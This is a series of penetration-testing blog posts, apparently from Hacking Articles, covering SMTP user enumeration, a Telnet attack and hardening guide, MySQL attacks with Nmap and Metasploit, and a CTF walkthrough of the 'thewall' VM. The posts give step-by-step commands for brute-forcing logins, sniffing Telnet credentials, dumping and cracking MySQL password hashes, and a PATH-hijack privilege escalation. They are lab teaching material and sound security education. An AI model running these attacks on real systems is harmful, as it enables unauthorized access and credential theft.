 smtp-user-enum is a tool for enumerating OS-level user accounts on Solaris via the SMTP service (sendmail). Enumeration is performed by inspecting the responses to VRFY, EXPN and RCPT TO commands. It could be adapted to work against other vulnerable SMTP daemons, but this hasn’t been done as of v1.0.

 Type following command to enumerate username using dictionary of usernames:

 smtp-user-enum -M VRFY -U /root/Desktop/user.txt -t 192.168.1.107

 -M: mode Method to use for username guessing EXPN, VRFY or RCPT 

 -U: file File of usernames to check via smtp service
 -t: host Server host running smtp service

From given image you can see out of total 7 queries only 5 names are valid and exist in smtp server.

Type following command to verify user email address on mail server:

smtp-user-enum -M VRFY -D mail.ignite.lab -u raj -t 192.168.1.107

-D:  dom   Domain to append to supplied user list to make email addresses; Use this option when you want to guess valid email addresses instead of just usernames.

From given image you can see it has shown raj@mail.ignite.lab is valid email ID for user raj.

iSMTP

iSMTP is the kali Linux toolw which is use for testing SMTP user enumeration (RCPT TO and VRFY), internal spoofing, and relay.

Type following command to enumerate valid email ID of targeted server:

ismtp -h 192.168.1.107:25 -e /root/Desktop/email.txt

-h <host>       The target IP and port (IP:port)

 -e <file>   Enable SMTP user enumeration testing and imports email list.

From given image you can see blue color text refer to valid email account and red color text refer to invalid account.

Author: Sanjeet Kumar is a Information Security Analyst | Pentester | Researcher  Contact Here

The post 4 ways to SMTP Enumeration appeared first on Hacking Articles.

Categories: Cyber India

Penetration Testing on Telnet (Port 23)

Sat, 23/Sep/2017 - 16:54

Welcome to Internal penetration testing on telnet server where you will learn telnet installation and configuration, enumeration and attack, system security and precaution.  

From Wikipedia

Telnet is a protocol used on the Internet or local area networks to provide a bidirectional interactive text-oriented communication facility using a virtual terminal connection. This protocol is used to establish a connection to Transmission Control Protocol (TCP) port number 23, where a Telnet server application (telnetd) is listening.

Let’s start!!!

Requirements

Telnet Server: Ubuntu

Attacker system: Kali Linux

Telnet Installation & Configuration in 3 steps

Installing telnet server is very simple, it will get activated by following three steps:

  • Open the terminal in ubuntu and type given below command with root access.

apt-get install xinetd telnetd

  • Open ineted.conf file add given below statement inside it, then save it.

gedit /etc/inetd.conf

telnet stream tcp nowait telnetd /usr/sbin/tcpd /usr/sbin/in.telnetd

  • Now open xibetd.conf and add following line for configuration setting and save it.

gedit /etc/xinetd.conf

# Simple configuration file for xinetd

#

# Some defaults, and include /etc/xinetd.d/

defaults

{

# Please note that you need a log_type line to be able to use log_on_success

# and log_on_failure. The default is the following :

# log_type = SYSLOG daemon info

instances = 60

log_type = SYSLOG authpriv

log_on_success = HOST PID

log_on_failure = HOST

cps = 25 30

}

includedir /etc/xinetd.d

Now execute following command to restart the service.

sudo /etc/init.d/xinetd restart

Now you can ensure whether telnet service is getting activated or not and for this we had scan our own system with nmap.

nmap –p 23 127.0.0.1

If service is activated in targeted server then nmap show open STATE for port 23.

SSH Banner grabbing through telnet

A telnet play an important role in banner grabbing of other service running on target system. Open the terminal in kali Linux and type following command for finding the version of SSH service running on targeted machine.

telnet 192.168.0.106 22

From given image you can observe that it has successfully shown the SSH version “2.0-openSSH_6.6.1p1”has been installed on target machine.

SMTP Banner grabbing through telnet

Similarly we can also find out version and valid user of SMTP server using telnet. Execute following command and find out its version and valid user.

telnet 192.168.0.25 25

From given image you can observe that it has successfully shown “220 mail.ignite.lab ESMTP Postfix” has been installed on target machine.

You can guess for valid user account through following command and if you receive response code 550 it means unknown user account:

vrfy raj@mail.lab.ignite

If you received message code 250,251,252 which means server has accept the request and user account is valid.

But if you received message code 550 it means invalid user account as shown in given image

vrfy raaz@mail.ignite.lab

Telnet Banner Grabbing through Metasploit

An attacker always perform enumeration for finding important information such as software version which known as Banner Grabbing and then identify it state of vulnerability against any exploit.

Open the terminal in your kali Linux and Load metasploit framework; now type following command to scan for TELNET version.

use auxiliary/scanner/telnet/telnet_version

msf auxiliary(telnet_version) > set rhosts 192.168.0.106

msf auxiliary(telnet_version) > set rport 23

msf auxiliary(telnet_version) >set threads 5

msf auxiliary(telnet_version) > exploit

From given image you can read the highlighted text which is showing the installed version of TELNET on target’s system.

Brute Force Attack

An attacker always tries to make brute force attack for stealing credential for unauthorized access.

This module will test a telnet login on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.

Now type following command to Brute force TELNET login:

use auxiliary/scanner/telnet/telnet_login

msf auxiliary(telnet_login) > set rhosts 192.168.0.106

msf auxiliary(telnet_login) > set user_file /root/Desktop/user.txt

msf auxiliary(telnet_login) > set pass_file /root/Desktop/pass.txt

msf auxiliary(telnet_login) > set stop_on_success true

msf auxiliary(telnet_login) > exploit

From given image you can observe that our TELNET server is not secure against brute force attack because it is showing matching combination of username: raj and password: 123 for login simultaneously it has opened victims command shell as session 1.

From given image you can see now we have unauthorized access on victim’s system as raj@ignite and executed ifconfig to verify the network interface.

We can also convert command shell into meterpreter shell using following command

sessions –u 1

From given image you can see that now we are having two sessions; 1st for command shell session and 2nd for meterpreter session.

Stealing credential through sniffing

Telnet, by default, does not encrypt any data sent over the connection (including passwords), and so it is often feasible to eavesdrop on the communications and use the password later for malicious purposes; anybody who has access the network between the two hosts where Telnet is being used can intercept the packets passing between source and destination and obtain login, password and data information.

From given image you can observe that here the client is login into telnet server by submitting valid credential on other hand attacker is sniffing network packet using wireshark  or other tools.

Here you can notice wireshark had captured telnet information by sniffing the network. It follow similar protocol as FTP where telnet users may authenticate themselves with a clear-text sign-in protocol for username and password. As result attacker can easily sniff login credential.

From given below image you can read the username: raj and password: 123 moreover complete information travelling through packet between source to destination.

Since Telnet implementations do not support Transport Layer Security (TLS) security and Simple Authentication and Security Layer (SASL) authentication extensions. Therefore in favour of that the Secure Shell (SSH) protocol, first released in 1995 in replaced of Telnet.

Secure Telnet through Port forwarding

In order to secure telnet server admin can forward port from default to specific port to run the service. Open services file using following command for making changes:

gedit /etc/services

From given image you can perceive that telnet default uses port 23 for its services; change the port number for telnet service.

From given below image you can compare that we had changed port 23 with 2323, now restart the service.

service xinetd restart

Verify it using nmap command as given below:

nmap –p 2323 –sV 192.168.0.106

Secure telnet against brute force attack

You can secure telnet server against brute force and from unauthorized access by adding filter using Iptable. Allow only specific IP address to establish connection with telnet server and reject or drop the connection from other IP addresses.

Now type following command with root permission to add filter for telnet in iptables.

Iptables –A INPUT –s 192.168.0.104 –p tcp –dport 23 –j ACCEPT

Above command will allow the traffic from IP address 192.168.0.104 to access the telnet service on port 23.

Iptables –A INPUT –p tcp –dport 23 –j DROP

Above command with drop the service for traffic coming from other IP addresses on port 23.

Restart the service once you add filter in iptables

sudo /etc/init.d/xinetd restart

Let verify the working of Ipatble by connecting to telnet server from client machine holding IP address 192.168.0.104.

Great!! Connection established successfully.

You can confirm it from given below image.

Let verify the working of Ipatble by connecting to telnet server from attacker machine holding different IP address.

From given below image you can see nothing is happing here because port 23 is down for all other IP addresses

Awesome!! It means if attacker sniff the valid credential then also will not able to access the telnet server.

 Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Penetration Testing on Telnet (Port 23) appeared first on Hacking Articles.

Categories: Cyber India

MySQL Penetration Testing with Nmap

Thu, 21/Sep/2017 - 20:42

In this article we are discussing MYSQL penetration testing using Nmap where you will learn how to retrieve database information such as database name, table’s records, username, password and etc.

MySQL is an open Source for Relational Database Management System that uses structured query language for generating database record.  

Lets Begin !!!

 Scanning for port 3306

 open the terminal and type following command to check mysql service is activated on targeted system or not, basically mysql service is activated on default port 3306.

nmap -sT 192.168.1.216

From given image you can observe port 3306 is open for mysql service, now lets enumerate it.

Retrieve mysql information

Now type another command to retrieve mysql information such as version, protocol and etc:

nmap –script=mysql-info 192.168.1.216

Above command try to connect to with MySQL server and hence prints information such as the protocol: 10, version numbers: 5.5.57 -0ubuntu0.14.04.1, thread ID: 159, status: auto commit, capabilities, and the password salt as shown in given below image.

Brute force attack

This command will use dictionary for username and password and then try to match the username and password combination by making brute force attack against mysql.

 nmap -p 3306 –script mysql-brute –script-args userdb=/root/Desktop.lst,passdb=/root/Desktop/pass.lst 192.168.1.216

 From given image you can observe that it found the valid credential root: toor. This credential will help in directly login into MYSQL server.

Retrieve mysql user names

This command will fetch mysql users name which help of given argument mysqluser root and mysqlpass toor.

Nmap -p 3306 –script=mysql-users 192.168.1.216 –script-args mysqluser=root,mysqlpass=toor

From given below image you can see we had found four user names: root, debian-sys-maint, sr, st.

Retrieve database names

This command will fetch mysql database name which help of given argument mysqluser root and mysqlpass toor.

nmap -p 3306 –script=mysql-databases 192.168.1.216 –script-args mysqluser=root,mysqlpass=toor

 From given below image you can read the name of created database such as ignite

This command will also perform same task as above but retrieve database name using mysql query “show database”

nmap -p 3306 192.168.1.216 –script mysql-query –script-args “query=show databases,username=root,password=toor”

 From given below image you can read the name of created database such as ignite

Retrieve mysql variable status ON/OFF

When we want to pass a value from one SQL statement to another SQL statement, then we store the value in a MySQL user-defined variable.

This command will fetch mysql variables name which help of given argument mysqluser root and mysqlpass toor.

nmap -p 3306 –script=mysql-variables 192.168.1.216 –script-args mysqluser=root,mysqlpass=toor

From given image you can observe ON/OFF status for mysql variable.

Retrieve Hash password

This command will Dumps the password hashes from a MySQL server in a format suitable for cracking by tools such as John the Ripper.

nmap -p 3306 –script=mysql-variables 192.168.1.216 –script-args mysqluser=root,mysqlpass=toor

From given image you can observe that it has dumped the hash value of passwords of respective user which we have enumerated above.

Sanjeet Kumar is a Information Security Analyst | Pentester | Researcher  Contact Here

The post MySQL Penetration Testing with Nmap appeared first on Hacking Articles.

Categories: Cyber India

Penetration Testing on MYSQL (Port 3306)

Thu, 21/Sep/2017 - 18:25

Hello friends!! Today we are discussing internal penetration testing on MYSQL server. In our previous article we had already discussed how to configure of mysql in ubuntu which you can read from here, now moving towards for its penetration testing.

Attacker: kali Linux

Target: ubuntu 14.04.1 (mysql server), IP: 192.168.1.216

Lets start !!

Scanning MYSQL

Scanning plays an important role in penetration testing because through scanning attacker make sure which services and open ports are available for enumeration and attack.

Here we are using nmap for scanning port 3306. 

nmap -sT 192.168.1.216

If service is activated in targeted server then nmap show open STATE for port 3306.

Enumerating MYSQL Banner

An attacker always perform enumeration for finding important information such as software version which known as Banner Grabbing and then identify it state of vulnerability against any exploit.

Open the terminal in your kali Linux and Load metasploit framework; now type following command to scan for MYSQL version.

use auxiliary/scanner/mysql /mysql _version

msf auxiliary(mysql_version) > set rhosts 192.168.1.216

msf auxiliary(mysql_version) > set rport 3306

msf auxiliary(mysql_version) > run

From given image you can read the highlighted text which is showing MYSQL 5.5.57 is the installed version of MYSQL with protocol 10 on ubuntu 14.04.1 operating system.

MYSQL Brute Force Attack

An attacker always tries to make brute force attack for stealing credential for unauthorized access.

This module simply queries the MySQL instance for a specific user/pass (default is root with blank).

msf > use auxiliary/scanner/mysql/mysql_login

msf auxiliary(mysql_login) > set rhosts 192.168.1.216

msf auxiliary(mysql_login) > set rport 3306

msf auxiliary(mysql_login) > set user_file /root/Desktop/users.txt

msf auxiliary(mysql_login) > set pass_file /root/Desktop/password.txt

msf auxiliary(mysql_login) > run

This will start brute force attack and try to match the combination for valid username and password using user.txt and pass.txt file.

From given image you can observe that our mysql server is not secure against brute force attack because it is showing matching combination of username: root and password: toor for login.

Once the attacker retrieves the valid credential he can directly login into mysql server for stealing or destroying the database information.

Stealing MYSQL information 

This module allows for simple SQL statements to be executed against a MySQL instance given the appropriate credentials.

use auxiliary/admin/mysql/mysql_sql

msf auxiliary(mysql_sql) > set rhost 192.168.1.216

msf auxiliary(mysql_sql) > set username root

msf auxiliary(mysql_sql) > set password toor

msf auxiliary(mysql_sql) > set SQL show databases;

msf auxiliary(mysql_sql) > run

From given image you can observe that it has executed the sql query for dumping the name of databases.

Extracting MYSQL Schema Information

This module extracts the schema information from a MySQL DB server.

use auxiliary/scanner/mysql/mysql_schemadump

msf auxiliary(mysql_schemadump) >set rhosts 192.168.1.216

msf auxiliary(mysql_schemadump) >set username root

msf auxiliary(mysql_schemadump) >set password toor

msf auxiliary(mysql_schemadump) >run

here it has dump the information schema for database “ignite” with table name “student” , 5 columns name with column types:

DB: ignite

Table name: student

Last Name

(varchar 30) First Name

(varchar 30) Student ID

(int 11) Major

(varchar 20) Dorm

(varchar 20)

Check File Privileges

Open my.cnf file to verify file privileges using following command:

gedit /etc/mysql/my.cnf

Here you can see given below statements are uncommented

  • Mysqld_safe
  • Mysqld
  • Secure_file _priv

If these statements are uncommented then it becomes very easy for attacker to perform file enumeration.

Mysql File Eumeration

This module will enumerate files and directories using the MySQL load_file feature.

Use auxiliary/scanner/mysql/mysql_file_enum

msf auxiliary(mysql_ file_enum) > set rhosts 192.168.1.216

msf auxiliary(mysql_ file_enum) > set username root

msf auxiliary(mysql_ file_enum) > set password toor

msf auxiliary(mysql_ file_enum) > set DIR_LIST/root/Desktop/file.txt

msf auxiliary(mysql_ file_enum) > run

Here it will start identifying whether the given files list is exist in the target system or not.

From given image you can observe that it has found /etc, /var, /var/www such directory exists.

Enumerate MYSQL writeable directories

Enumerate writeable directories using the MySQL SELECT INTO DUMPFILE feature, for more information see the URL in the references. ***Note: For every writable directory found, a file with the specified FILE_NAME containing the text test will be written to the directory. ***

use auxiliary/scanner/mysql/mysql_writable_dirs

msf auxiliary(mysql_writable_dirs) > set rhosts 192.168.1.216

msf auxiliary(mysql_writable_dirs) > set username root

msf auxiliary(mysql_writable_dirs) > set password toor

msf auxiliary(mysql_writable_dirs) > set DIR_LIST/root/Desktop/file.txt

msf auxiliary(mysql_writable_dirs) > run

Here we had assign a list of files so that we can identify the writable directory and from given image you can observe that it has found writable permission only for /tmp.

Mysql User Enumeration

This module allows for simple enumeration of MySQL Database Server provided proper credentials to connect remotely.

use auxiliary/admin/mysql/mysql_enum

msf auxiliary(mysql_enum) > set rhost 192.168.1.216

msf auxiliary(mysql_enum) > set username root

msf auxiliary(mysql_enum) > set password toor

msf auxiliary(mysql_enum) > run

It will start retrieving information such as list of other user account and user privileges on mysql server.

From given image it will be clear to you, that it has shown list of account with hash password and list of user who have GRANT privileges.

As you can see other than user root it has some more user such as sr with hash password, here you can crack this password using password cracker tool.

Extract MYSQL Username with Hash Password

This module extracts the usernames and encrypted password hashes from a MySQL server and stores them for later cracking.

use auxiliary/scanner/mysql/mysql_hashdump

msf auxiliary(mysql_hashdump) > set rhosts 192.168.1.216

msf auxiliary(mysql_hashdump) > set username root

msf auxiliary(mysql_hashdump) > set toor

msf auxiliary(mysql_hashdump) > run

Now from screenshot you can see the hash value of password is given for all users. Metasploit store these hash value inside /tmp folder and later use john the ripper for cracking password.

Crack Hash Password with John the Ripper

This module uses John the Ripper to identify weak passwords that have been acquired from the mysql_hashdump module. Passwords that have been successfully cracked are then saved as proper credentials

use auxiliary/analyze/jtr_mysql_fast

msf auxiliary(jtr_mysql_fast) >options

msf auxiliary(jtr_mysql_fast) >run

By default it will use metasploit wordlist where hash value has been saved and start cracking hash value.

If you notice the given below image you can perceive that it has successfully crack the double SHA-1 hashing and decrypt the password into plain text.

Now using above retrieved credential you can try to login into mysql server.

Here you can see we had successfully login into server. Hence attacker can easily breach the security of server and steal the important information or modify it.

Secure MYSQL through port forwarding

In order to secure mysql server admin can forward port from default to specific port to run the service. Open my.conf file using following command for making changes:

gedit /etc/mysql/my.conf

Now change port 3306 into any other port such as 3000 as shown in given image and save the changes and restart the service.

service mysql restart

Verify it using nmap command as given below:

nmap -sT 192.168.1.216

Prevent Mysql against brute force attack

In order to secure mysql server admin can bind the service to its localhost. Open my.conf file using following command for making changes:

gedit /etc/mysql/my.conf

Only you need to enable bind-address by making it uncomment  as shown in given images.

service mysql rstart

Now let’s verify it by making brute force attack same as above using dictionary.

Great!! Attacker is not able to connect the server which resists brute force attack also as shown in given image.

Admin should GRANT all privilege to a specific user only with specific IP address which prevents database information alteration from attackers.

Now for granting all privileges; login into mysql server and type following query:

mysql> GRANT ALL PRIVILEGES ON *-* TO ‘root’@‘192.168.1.220’ IDENTIFIED BY ‘toor’ WITH GRANT OPTION;

To tell the server to reload the grant tables, perform a flush-privileges operation

mysql > flush privileges;

Author: Sanjeet Kumar is a Information Security Analyst | Pentester | Researcher  Contact Here

The post Penetration Testing on MYSQL (Port 3306) appeared first on Hacking Articles.

Categories: Cyber India

Hack the thewall VM (CTF Challenge)

Thu, 21/Sep/2017 - 16:10

Hello friends! Today we are going to take another CTF challenge known as thewall. The credit for making this vm machine goes to “Xerubus” and it is another boot2root challenge where we have to root the VM to complete the challenge. You can download this VM here.

Let’s Breach!!!

Let us start form getting to know the IP of VM (Here, I have it at 192.168.0.17 but you will have to find your own)

netdiscover

We did a nmap scan but it showed nothing. So we use arp to check if it is broadcasting anything.

arp –an

We found that it is broadcasting something on the network, so we use wireshark to check at which port it is broadcasting the data.

We found that it is broadcasting something at port 1337 so we use netcat to listen at port 1337.

nc –lvp 1337

We found it was broadcasting something related to pink Floyd, we again do a nmap scan to check if it affected anything.

nmap -sV 192.168.0.17

As we can see that port 80 is open, so we open this ip in our browser.

We take a look at the source code of the browser and find a hexadecimal encoded string.

When we decode it we find a md5 encoded string and hint to do stegnography.

We decode the md5 encoded string and found a string called divisionbell.

We download the image from the webpage and using steghide we check if something is hidden behind the image. When try to extract information it prompts for password using the string we decoded above we are able to find that a text file is hidden behind the image and are able to extract it.

steghide –info pink_floyd.jpg

steghide extract –sf pink_floyd.jpg

When we open the text file we find a base64 encoded string and md5 encoded string and a hint to use it at port 1965.

First we decode the base64 encoded string and found the string SydBarret.

Then we decode the md5 encoded string and found the string pinkfloydrocks.

Port enumeration on 1965 shows it is running openssh, we check if we can login using this as username:SydBarret and password:pinkfloydrocks.

When we try to login it shows us that we can only connect through sftp. So we use SydBarrett as username and pinkfloydrocks as password to login through sftp.

Now that we are inside, we find a file called eclipsed_by_the_moon, we download it to our system.

We check what kind of file it is, we find that it is a zip file, we extract it using tar.

file eclipsed_by_the_moon

tar xvfz eclipsed_by_the_moon

After extracting the file, we check what kind of file it is and find that it is a boot sector.

file eclipsed_by_the_moon.lsd

We check if we can recover any file inside the boot sector using testdisk.

testdisk eclipsed_by_the_moon.lsd

We select the image to recover files from.

We select none portioned media as it is a boot sector.

We go to advanced to recover file from the image.

We then select the partition in which we want to extract the file from and select undelete to recover the files.

We find that an image file is recovered, we copy it.

We select the directory of our system in which we want to copy the file.

We check the image we just recovered and find the picture of Roger Waters, we also got a password inside the image.

We login trough ssh, enumerating the username we find that RogerWaters is the username and password is hello_is_there_anybody_in_there.

After getting in, we find that there are different directory for different users of pink floyd band members.

ls -al

We also find that we have limited access and cannot access their directories so we check for binaries available to other users and find that user NickMason and DavidGilmour have binaries called brick and shineon available to them.

find / -user DavidGilmour 2>/dev/null

find / -user NickMason 2>/dev/null

We don’t have access to run the binary shineon but when we run brick it asks us a question. When we answer it correctly we become the user NickMason.

Now we can access the directory NickMason/. We find an image file inside we use scp to send it to our local system.

scp nick_mason_profile_pic.jpg root@192.168.0.16:/root/Desktop

We check the file type and find that it is an audio file. We change the file from .jpg to .ogg.

When we listen to the audio, we find that morse code is also playing in the background along with the music. We cut the frequency of the audio to retrieve the morse code.

.-. .. -.-. …. .- .-. -.. .– .-.  .. –. …. – .—- —-. ….- …– ..-. .. … .-

We find that the morse code translates to richardwright1943farfisa. We use RichardWright as username and 1943farfisa as password to login as user RichardWright.

Now we try to run the binary shineon, after running the binary we find that we can change the folder with symbolic link from DavidGilmour to RichardWright.

ln –s /bin/ksh /tmp/mail

export PATH:/tmp:$PATH

When we now run the shineon we become user DavidGilmour.

Inside DavidGilmour/ folder we find a link inside the file.

When we open this link on the browser we find an image on which something is written.

When we decrease the contrast of the image, we find a hexadecimal string.

Then we also send an image file that we find inside the DavidGilmour/ folder using scp.

scp david_gilmour_profile_pic.jpg root@192.168.0.16:/root/Desktop/

We check for strings inside the image file and found string who_are_you_and_who_am_i.

Now we use DavidGilmour as username and who_are_you_and_who_am_i as password.

We now are in welcometothemachine group; we move inside /var/www/htdocs/welcometothemachine/.

We find a file called PinkFloyd, we run the file and find it asks a question. We use the hexadecimal string inside the image we find on the webpage.

Now we are given the permission to get root, as DavidGilmour is added into sudoers after running this program.

Now when we enter root/ directory and we find the flag stating the end of the VM challenge.

Author: Sayantan Bera is a technical writer at hacking articles and cyber security enthusiast. Contact Here

 

The post Hack the thewall VM (CTF Challenge) appeared first on Hacking Articles.

Categories: Cyber India